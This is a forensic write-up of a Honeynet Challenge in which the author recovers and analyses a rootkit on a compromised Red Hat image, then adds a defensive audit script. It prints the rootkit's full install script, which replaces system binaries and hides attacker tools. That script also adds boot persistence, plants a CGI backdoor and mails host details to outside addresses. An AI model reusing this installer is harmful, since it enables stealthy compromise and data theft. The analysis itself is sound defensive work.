Step by Step:
1. Acquire the compressed image from:
http://project.honeynet.org/scans/scan15/honeynet.tar.gz
2. Mount the image read-only on a Linux system:
# mkdir /honeynet
# mount -o ro,loop,nodev,noexec honeypot.hda8.dd /honeynet
3. Download and install The Coroner's Toolkit, TCTUTILS, and Autopsy. Since the READMEs for all the packages are self-explanatory, I am only including links to these files.
The Coroner's Toolkit: http://www.porcupine.org/forensics/tct.html
TCT Utils: http://www.cerias.purdue.edu/homes/carrier/forensiscs
Autopsy: http://www.cerias.purdue.edu/homes/carrier/forensiscs
4. After the above products are installed, launch autopsy to begin the analysis:
# autopsy 8888 localhost

Autopsy Forensic Browser ver 1.0
Investigator: Quincy

Paste this as your browser URL on localhost:
localhost:8888/3004636400/autopsy
5. Pasting the URL in your browser will bring you to the Autopsy main menu:
Select both boxes under the image and click on "Enter the Lab":
You are now presented with a "File" listing of all deleted files in the "/" partition. Scrolling down to the bottom you will be presented with the most recently deleted files and directories. Referencing the MAC time stamps we see a single file, lk.tgz, that was modified, accessed and created in "/" on March 15th, 2001. This file looks intriguing, so we will restore it for further investigation.
6. We only need the inode number of the deleted file in question to recover it using icat from The Coroner's Toolkit:
# icat /honeynet/honeypot.hda8.dd 23 > /honeynet/lk.tgz
7. Uncompressing this file creates a directory named last with the following contents:
# ls -ltr /honeynet/last
total 1472
-rwxr-xr-x   1 1031     users        1345 Sep  9  1999 cleaner*
-rw-------   1 1031     users         512 Oct 22  2000 ssh_random_seed
-rw-r--r--   1 1031     users         344 Oct 22  2000 ssh_host_key.pub
-rw-------   1 1031     users         540 Oct 22  2000 ssh_host_key
-rw-r--r--   1 1031     users         880 Oct 22  2000 ssh_config
-rw-r--r--   1 1031     users        3278 Jan 27 10:11 inetd.conf
-rw-r--r--   1 1031     users       11407 Jan 27 10:11 services
-rwxr-xr-x   1 1031     users      632066 Feb 26 09:46 mkxfs*
-rwx------   1 1031     users        7165 Feb 26 10:22 linsniffer*
-rwxr-xr-x   1 1031     users        4060 Feb 26 10:22 sense*
-rwx------   1 1031     users        8268 Feb 26 10:22 sl2*
-rwxr-xr-x   1 1031     users        4620 Feb 26 10:23 last.cgi*
-rwxr-xr-x   1 1031     users       33280 Feb 26 10:23 ps*
-rwxr-xr-x   1 1031     users       35300 Feb 26 10:23 netstat*
-rwxr-xr-x   1 1031     users       19840 Feb 26 10:23 ifconfig*
-rwxr-xr-x   1 1031     users       53588 Feb 26 10:23 top*
-rwx------   1 1031     users          75 Feb 26 10:24 logclear*
-rwxr-xr-x   1 1031     users          79 Feb 26 10:28 lsattr*
-rw-r--r--   1 1031     users         688 Feb 26 10:29 sshd_config
-rw-r--r--   1 1031     users           1 Feb 26 10:29 pidfile
-rw-r--r--   1 root     root          708 Mar  2 22:05 s
-rwx------   1 1031     users        3713 Mar  2 22:08 install*
-rwxr-xr-x   1 1031     users      611931 Feb  8  2002 ssh*
We have found the contents of our rootkit!
A quick cat of /last/install lets us follow the installation of this rootkit on the compromised system.
# cat /last/install
#!/bin/sh
clear
unset HISTFILE
echo "********* Instalarea Rootkitului A Pornit La Drum *********"
echo "********* Mircea SUGI PULA ********************************"
echo "********* Multumiri La Toti Care M-Au Ajutat **************"
echo "********* Lemme Give You A Tip : **************************"
echo "********* Ignore everything, call your freedom ************"
echo "********* Scream & swear as much as you can ***************"
echo "********* Cuz anyway nobody will hear you and no one will *"
echo "********* Care about you **********************************"
echo
echo
chown root.root *
if [ -f /usr/bin/make ]; then
echo "Are Make !"
else
echo "Nu Are Make !"
fi
if [ -f /usr/bin/gcc ]; then
echo "Are Gcc !"
else
echo "Nu Are Gcc !"
fi
if [ -f /usr/sbin/sshd/ ]; then
echo "Are Ssh !"
else
echo "Nu Are Ssh !"
fi
echo -n "* Inlocuim nestat ... alea alea "
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
cp -f mkxfs /usr/sbin/
echo "* Gata..."
echo -n "* Dev... "
echo
echo
touch /dev/rpm
>/dev/rpm
echo "3 sl2" >>/dev/rpm
echo "3 sshdu" >>/dev/rpm
echo "3 linsniffer" >>/dev/rpm
echo "3 smurf" >>/dev/rpm
echo "3 slice" >>/dev/rpm
echo "3 mech" >>/dev/rpm
echo "3 muh" >>/dev/rpm
echo "3 bnc" >>/dev/rpm
echo "3 psybnc" >> /dev/rpm
touch /dev/last
>/dev/last
echo "1 193.231.139" >>/dev/last
echo "1 213.154.137" >>/dev/last
echo "1 193.254.34" >>/dev/last
echo "3 48744" >>/dev/last
echo "3 3666" >>/dev/last
echo "3 31221" >>/dev/last
echo "3 22546" >>/dev/last
echo "4 48744" >>/dev/last
echo "4 2222" >>/dev/last
echo "* Gata"
echo "* Facem Director...Si Mutam Alea.. "
mkdir -p /dev/ida/.drag-on
mkdir -p /dev/ida/".. "
echo "* Copiem ssh si alea"
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/.drag-on/
cp linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed /dev/ida/".. "
rm -rf linsniffer logclear sense sl2 mkxfs s ssh_host_key ssh_random_seed
touch /dev/ida/.drag-on/tcp.log
touch /dev/ida/".. "/tcp.log
cp -f inetd.conf /etc
cp -f services /etc
killall -HUP inetd
echo
echo
echo
echo "* Adaugam In Startup:) ..."
rm -rf /usr/bin/lsattr
echo "/usr/bin/lsattr -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
cp -f lsattr /usr/bin/
chmod 500 /usr/bin/lsattr
chattr +i /usr/bin/lsattr
/usr/bin/lsattr
sleep 1
if [ -d /home/httpd/cgi-bin ]
then
mv -f last.cgi /home/httpd/cgi-bin/
fi
if [ -d /usr/local/httpd/cgi-bin ]
then
mv -f last.cgi /usr/local/httpd/cgi-bin/
fi
if [ -d /usr/local/apache/cgi-bin ]
then
mv -f last.cgi /usr/local/apache/cgi-bin/
fi
if [ -d /www/httpd/cgi-bin ]
then
mv -f last.cgi /www/httpd/cgi-bin/
fi
if [ -d /www/cgi-bin ]
then
mv -f last.cgi /www/cgi-bin/
fi
echo "* Luam Informatiile dorite ..."
echo "* Info : $(uname -a)" >> computer
echo "* Hostname : $(hostname -f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> computer
echo "* Uptime : $(uptime)" >> computer
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> computer
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> computer
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> computer
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> computer
echo "* Spatiu Liber: $(df -h)" >> computer
echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog "
cat computer | mail -s "placinte" last@linuxmail.org
cat computer | mail -s "roote" bidi_damm@yahoo.com
echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie ."
echo
echo
echo "* G A T A *"
echo
echo "* That Was Nice Last "
cd /
rm -rf last lk.tgz computer lk.tar.gz
8. Returning to the Autopsy deleted-file listing, we can see that the /last directory was also deleted from the compromised system. Based on the MAC time stamps and on the recovery of the deleted rootkit, we now know that the compressed file was uncompressed on the system. But the question remains: was the rootkit actually installed?
9. After following through the install script and analyzing the deleted output from Autopsy, you can quickly determine that the rootkit was in fact installed on this compromised system.
The quick correlation I used was the creation of the file /dev/last, referenced in the install script:
<snip>
touch /dev/last
>/dev/last
echo "1 193.231.139" >>/dev/last
echo "1 213.154.137" >>/dev/last
echo "1 193.254.34" >>/dev/last
echo "3 48744" >>/dev/last
echo "3 3666" >>/dev/last
echo "3 31221" >>/dev/last
echo "3 22546" >>/dev/last
echo "4 48744" >>/dev/last
echo "4 2222" >>/dev/last
</snip>
If you traverse the Autopsy file browser into the /dev directory you will locate this file; here is an example of an Autopsy ASCII report on /dev/last:
Further correlation can be made by comparing the MD5 checksums of the trojaned binaries with the checksums of the same binaries from the original Red Hat install disk.
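Added example (not code from the original write-up): a POSIX shell audit that checks a mounted image for the artifacts the recovered install script leaves behind (/dev/rpm, /dev/last, the hidden /dev/ida directories and the rc.sysinit startup line) and then compares the binaries the script replaces against a baseline of known-good MD5 sums, covering both the /dev/last correlation in step 9 and the checksum comparison above. The artifact paths are taken from the recovered script; the baseline format (md5sum output with image-relative paths, produced from the original install media), the script name rk_audit.sh, the mktemp demo tree and its made-up file contents are assumptions.

```shell
#!/bin/sh
# Added example, not from the original write-up: audit a read-only mounted
# image for the artifacts the recovered install script leaves behind, then
# compare the binaries the script replaces against known-good MD5 sums.
# Assumed baseline format: md5sum output with paths relative to the image root.

check_path() {   # $1 image root, $2 relative path, $3 note
    if [ -e "$1/$2" ]; then echo "FOUND    $2  ($3)"; RK_FOUND=$((RK_FOUND + 1)); fi
}

audit_artifacts() {   # $1 image root; sets RK_FOUND to the number of hits
    RK_FOUND=0
    check_path "$1" "dev/rpm"          "name list written by the install script"
    check_path "$1" "dev/last"         "address/port list written by the install script"
    check_path "$1" "dev/ida/.drag-on" "hidden tool directory"
    check_path "$1" "dev/ida/.. "      "hidden tool directory (name ends in a space)"
    if grep -q 'lsattr -t1 -X53 -p' "$1/etc/rc.d/rc.sysinit" 2>/dev/null; then
        echo "FOUND    etc/rc.d/rc.sysinit  (startup hook for the replaced lsattr)"
        RK_FOUND=$((RK_FOUND + 1))
    fi
}

verify_binaries() {   # $1 image root, $2 baseline file; sets RK_MODIFIED
    RK_MODIFIED=0
    while read -r sum path; do
        if [ ! -f "$1/$path" ]; then echo "MISSING  $path"; RK_MODIFIED=$((RK_MODIFIED + 1)); continue; fi
        actual=$(md5sum "$1/$path" | cut -d' ' -f1)
        if [ "$actual" = "$sum" ]; then echo "OK       $path"
        else echo "MODIFIED $path"; RK_MODIFIED=$((RK_MODIFIED + 1)); fi
    done < "$2"
}

# Constructed demo image: paths come from the install script, file contents are
# made up so the example runs without the real honeynet image.
build_demo_image() {   # prints the root of the fake image
    root=$(mktemp -d)
    mkdir -p "$root/etc/rc.d" "$root/dev/ida/.drag-on" "$root/dev/ida/.. " "$root/bin" "$root/sbin"
    echo "/usr/bin/lsattr -t1 -X53 -p" >> "$root/etc/rc.d/rc.sysinit"
    echo "3 sl2" > "$root/dev/rpm"; echo "1 193.231.139" > "$root/dev/last"
    echo "vendor ps" > "$root/bin/ps"; echo "vendor ifconfig" > "$root/sbin/ifconfig"
    ( cd "$root" && md5sum bin/ps sbin/ifconfig > baseline.md5 )   # known-good sums
    echo "trojaned ps" > "$root/bin/ps"                             # simulates "mv ps /bin/ps"
    echo "$root"
}

if [ "$#" -ge 1 ]; then   # real use (assumed name): sh rk_audit.sh /honeynet baseline.md5
    audit_artifacts "$1"; [ -z "$2" ] || verify_binaries "$1" "$2"
else                      # no arguments: run against the constructed demo image
    DEMO=$(build_demo_image); audit_artifacts "$DEMO"; verify_binaries "$DEMO" "$DEMO/baseline.md5"
fi
```

With no arguments the script builds and audits the constructed demo tree, reporting five artifacts and one modified binary (bin/ps); paths containing spaces in the baseline file are not handled by the simple read loop.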
This completes my step-by-step analysis of the compromised Red Hat system for the March 15, 2001 Honeynet Challenge.